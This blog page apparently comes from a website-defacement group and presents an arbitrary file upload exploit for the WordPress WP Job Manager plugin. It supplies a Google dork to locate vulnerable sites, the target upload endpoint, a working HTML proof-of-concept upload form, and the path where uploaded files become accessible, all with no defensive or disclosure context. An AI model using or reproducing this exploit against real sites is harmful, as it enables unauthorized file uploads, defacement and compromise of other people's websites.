Home > Defacing > Injection > WordPress Plugins WP Job Manager - Arbitrary File Upload

WordPress Plugins WP Job Manager - Arbitrary File Upload

Friday, June 02, 2017 Defacing, Injection

Google Dork : inurl:/wp-content/plugins/wp-job-manager/
Exploit : https://localhost/jm-ajax/upload_file/
Vulnerability : FormCraft {"files":[]}

PoC :
<form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload!</button><br/>
</form>

File Access : https://localhost/wp-content/uploads/job-manager-uploads/files/tahun/bulan/your-files.jpg

Great : Indonesian Freedom Security - Base POM303

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )

CowoKerensTeam

Header Ads

WordPress Plugins WP Job Manager - Arbitrary File Upload

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts

CowoKerensTeam

Header Ads

WordPress Plugins WP Job Manager - Arbitrary File Upload

Related Posts

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts